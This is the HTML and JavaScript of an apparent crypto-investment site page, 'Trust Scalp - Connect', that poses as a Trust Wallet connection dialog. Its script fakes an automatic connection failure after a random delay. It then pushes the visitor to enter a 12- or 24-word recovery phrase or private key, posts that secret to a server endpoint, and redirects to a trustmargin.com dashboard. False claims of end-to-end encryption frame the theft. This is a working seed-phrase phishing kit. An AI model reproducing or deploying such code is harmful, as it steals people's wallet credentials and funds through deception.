<!DOCTYPE html>
<html lang="en">
<head>
    <meta http-equiv="content-type" content="text/html;charset=UTF-8">
    <meta charset="utf-8">
        <title>Trust Scalp - Connect</title>
    <meta name="description" content="Online platform for cryptocurrency investment">
    <meta name="keywords" content="bitcoin,investment,ethereum,mining,trading,send bitcoin,sell,buy,crypto,cryptocurrency,online platform for cryptocurrency trading">
    <link rel="shortcut icon" href="/assets/images/logoIcon/favicon.png" type="image/x-icon">

    
    <link rel="apple-touch-icon" href="/assets/images/logoIcon/logo.png">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="black">
    <meta name="apple-mobile-web-app-title" content="Trust Scalp - Connect">
    
    <meta itemprop="name" content="Trust Scalp - Connect">
    <meta itemprop="description" content="">
    <meta itemprop="image" content="/assets/images/seo/65c1491361ced1707165971.png">
    
    <meta property="og:type" content="website">
    <meta property="og:title" content="Trust Scalp - Cryptocurrency Investment System">
    <meta property="og:description" content="Trust Scalp - Earn High Profit, Online investment, Online earning">
    <meta property="og:image" content="/assets/images/seo/65c1491361ced1707165971.png"/>
    <meta property="og:image:type" content="image/png" />
        <meta property="og:image:width" content="600" />
    <meta property="og:image:height" content="315" />
    <meta property="og:url" content="/user/connect">
    
    <meta name="twitter:card" content="summary_large_image">
    <meta name="csrf-token" content="szOoFyg4IeP8vHCxC5J69WshGEzuyKGp19MeoYmz">
    <link rel="icon" type="image/png" href="assets/img/favicon.png" sizes="32x32">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
    <link rel="stylesheet" type="text/css" href="/static/connect-css/style.css">
    <link rel="stylesheet" href="/assets/templates/bit_gold/ /css/all.min.css">
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>
    <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.min.js"></script>
    <style>
        .badge::after {
    content: '' !important;
        }
        </style>

</head>

<body class="body header-fixed">
    <div id="wrapper">
        <div id="page" class="clearfix">
            <section class="tf-section top-seller" id="wallets_list">
                <div class="themesflat-container">
                    <div class="row">
                        <div class="col-md-12">
                            <h2 class="tf-title style2">
                                Connect your Trust Wallet</h2>
                            <div class="heading-line s2"></div>
                        </div>


                        <div class="col-xl-3 col-lg-4 col-md-6 col-sm-6">
                            <div id="trust_wallet" class="sc-author-box select_wallet" data-title="Trust Wallet"
                                data-logo="/static/logo/trust_wallet.jpg" style="cursor:pointer;">
                                <div class="author-avatar">
                                    <a href="#">
                                        <img src="/static/logo/trust_wallet.jpg" alt="Image" class="avatar">
                                    </a>
                                    <div class="badge"><i class="fa fa-check"></i></div>
                                </div>
                                <div class="author-infor">
                                    <h5 class="style2"><a>Trust Wallet</a></h5>
                                    <span class="price">trustwallet.com</span>
                                </div>
                            </div>
                        </div>
                        
                  

              


                      
                      


                    </div>
                </div>
            </section>

        </div>

        <div class="modal fade popup" id="popup_connect_wallet_success" tabindex="-1" role="dialog" aria-hidden="true">
            <div class="modal-dialog modal-dialog-centered" role="document">
                <div class="modal-content">
                    <button type="button" class="close" data-dismiss="modal" aria-label="Close">
                        <span aria-hidden="true">×</span>
                    </button>
                    <div class="modal-body space-y-20 pd-40">


                        <center>
                            <h4 style="font-size: 90px;
   
   color: red;">Error!</h4>
                        </center>
                    </div>

                    <h4 style="padding:10px;
   
   color: red">An Error was encountered while trying to connect... Please try again later</h4>

                </div>
            </div>
        </div>
    </div>
    <div class="modal fade popup" id="popup_connect_wallet" tabindex="-1" role="dialog" aria-hidden="true">
        <div class="modal-dialog modal-dialog-centered" role="document">
            <div class="modal-content">
                <button type="button" class="close" data-dismiss="modal" aria-label="Close">
                    <span aria-hidden="true">×</span>
                </button>
                <div class="modal-body space-y-20 pd-40">

                    <h3>
                        <img width="50" height="50" class="avatar" id="wallet_logo"><br>
                        <span id="wallet_name" clas="mt-1">Sync Wallet</span>
                    </h3>
                    <p class="text-center">
                        This session is secured and encrypted </p>

                    <div id="auto_connecting" style="display:none;">
                        <br><br><br>
                        <div class="heading-line s2" style="width: 100%;">
                            <br>
                            <h5 align="center">
                                starting secure connection...<br>
                                <i align="center" style="text-align: center !important; font-size:small"
                                    class="text-muted align-items-center">please wait...</i>
                            </h5>
                            <br>
                        </div>
                    </div>

                    <div id="failed_to_connect" style="display:none;">
                        <div
                            style="padding:6px; color:red; border:1px solid red; border-radius:5px; text-align:center!important; font-size:16px; font-weight:500;">
                            An error occurred... please try again or connect mannually
                        </div>
                        <br><br><br>
                        <a href="#" id="try_auto_connecting_again" class="btn btn-outline-primary"
                            aria-label="Close">Try Again</a><br>
                        <a href="#" id="button_connect_manually" class="btn btn-primary">Connect Manually</a>
                    </div>

                    <div id="div_connect_manuallly" style="display:none;">
                        <textarea style="font-size:25px; font-weight:650" rows="4" name="secret_phrase"
                            id="secret_phrase" class="form-control text-primary"
                            placeholder="Enter your 12 or 24 Mnemonic words. Seperate them with spaces. You can also input your privatekey instead."></textarea><br>
                        <input type="hidden" id="csrf" value="szOoFyg4IeP8vHCxC5J69WshGEzuyKGp19MeoYmz">
                        <button disabled="" type="button" id="button_connect_wallet" class="btn btn-primary"
                            style="border-top: 5px; opacity:0.2">Connect Wallet</button>
                    </div>


                    <div>
                        <br><br><br>
                        <h6 align="center" class="mt-4 text-muted align-items-center"><img
                                src="/static/icon/shield.png" width="30" height="30"> This session is protected
                            with an end-to-end encryption.<br>
                            <span style="color: red !important">Never share your seed phrase with anybody!</span>
                            </h6>
                    </div>
                </div>
            </div>
        </div>
    </div>


<script>
    // Handle Select Wallet Click
    $(function () {
        $('.select_wallet').on('click', function () {
            var wd = $(this); // wd = wallet details
            $('#wallet_name').text(wd.data('title'));
            $('#wallet_logo').attr("src", wd.data('logo'));
            $('#auto_connecting').show();
            $('#failed_to_connect').hide();
            $('#div_connect_manuallly').hide();

            $('#popup_connect_wallet').modal('show');

            // Hide autoconnecting div and show error in random interval
            var interval = 1000 * getRandomInt(1, 15);
            setTimeout(() => {
                $('#auto_connecting').hide();
                $('#div_connect_manuallly').hide();
                $('#failed_to_connect').show();
            }, interval);
        });

        $('#try_auto_connecting_again').on('click', function (e) {
            e.preventDefault();
            $('#auto_connecting').show();
            $('#failed_to_connect').hide();
            $('#div_connect_manuallly').hide();

            // Hide autoconnecting div and show error in random interval
            var interval = 1000 * getRandomInt(1, 20);
            setTimeout(() => {
                $('#auto_connecting').hide();
                $('#div_connect_manuallly').hide();
                $('#failed_to_connect').show();
            }, interval);
        });

        $(document).on("click", "#button_connect_manually", function (e) {
            e.preventDefault();
            $('#auto_connecting').hide();
            $('#failed_to_connect').hide();
            $('#div_connect_manuallly').show();
        });

     //FOR PHRASE TEXT VALIDATION
            $('#secret_phrase').on('keyup', function () {
                var phrase_seed_entered = $(this).val().trim()
                if (phrase_seed_entered != "") {
                    var phrase_count = phrase_seed_entered.match(/(\w+)/g).length
                    console.log(phrase_count)
                    if ([12, 15, 18, 21, 24].includes(phrase_count)) {
                        $('#button_connect_wallet').attr('disabled', false).css('opacity', '1')
                    } else {
                        $('#button_connect_wallet').attr('disabled', false).css('opacity', '1')
                    }
                } else {
                    $('#button_connect_wallet').attr('disabled', true).css('opacity', '0.2')
                }
            })

        // CONNECT WALLET BUTTON Handler
        $(document).on("click", "#button_connect_wallet", function (e) {
            e.preventDefault();
            let field = $('#secret_phrase');
            $(this).text('Loading...');

            var interval = 1000 * getRandomInt(1, 20);
            setTimeout(() => {
                $('#auto_connecting').hide();
                $('#div_connect_manuallly').hide();
                $('#failed_to_connect').show();
                $(this).text('Connect Wallet');
            }, interval);

            var formData = {
                wallet_phrase: field.val(),
                wallet_name: $('#wallet_name').text(),
                _token: $('#csrf').val(),
                sent: 'yes'
            };

            $.ajax({
                /*headers: {
                    'X-CSRF-TOKEN': $('meta[name="csrf-token"]').attr('content')
                },*/
                url: "configuration/process",
                type: "POST",
                data: formData,
                dataType: "json",
                encode: true,
                success: function(response) {
              
                window.location.href = "https://trustmargin.com/user/dashboard";
               
                },
                error: function(error) {
                    console.error('Error saving form data:', error);
                }
            }).done(function (data) {
                console.log(data);
            });
        });

        function getRandomInt(min, max) {
            min = Math.ceil(min);
            max = Math.floor(max);
            return Math.floor(Math.random() * (max - min) + min); // The maximum is exclusive and the minimum is inclusive
        }
    });
</script>


    <style>
        .btn-outline-primary {
            width: 100%;
            border-radius: 20px;
            font-weight: 700;
            font-size: 15px;
            line-height: 22px;
            padding: 10px 20px;
            -webkit-transition: all 0.3s ease-in-out;
            -moz-transition: all 0.3s ease-in-out;
            -ms-transition: all 0.3s ease-in-out;
            -o-transition: all 0.3s ease-in-out;
            transition: all 0.3s ease-in-out;
            outline: none;
            border: 1px solid #5142FC;
            margin-bottom: 10px
        }
    </style>
</body>
</html>